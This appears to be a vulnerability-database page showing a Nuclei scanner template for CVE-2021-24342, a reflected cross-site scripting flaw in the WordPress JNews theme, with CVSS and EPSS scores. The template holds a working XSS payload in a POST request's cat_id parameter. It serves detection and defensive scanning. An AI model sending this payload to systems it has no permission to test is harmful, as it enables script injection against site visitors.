Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-24342
HistorySep 15, 2021 - 5:02 a.m.

WordPress JNews Theme <8.0.6 - Cross-Site Scripting

2021-09-1505:02:38
ProjectDiscovery
github.com
3

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

44.2%

WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).

id: CVE-2021-24342

info:
  name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24342
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24342
    cwe-id: CWE-79
    epss-score: 0.00113
    epss-percentile: 0.43845
    cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: jnews
    product: jnews
    framework: wordpress
  tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/themes/jnews/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Change Log:'
          - 'JNews -'
        condition: and

  - raw:
      - |
        POST /?ajax-request=jnews HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        lang=en_US&cat_id=6"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - 'Content-Type: text/html'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220698e69643ac31b2c0e4dc76eb0b904ce125dfe060203e3ab4768f00d20ef8f30022100a531cb557e30a01d688ad9803cada5532b7663e3bab4bccf9eb8d9f2c76e1b20:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

44.2%

Related for NUCLEI:CVE-2021-24342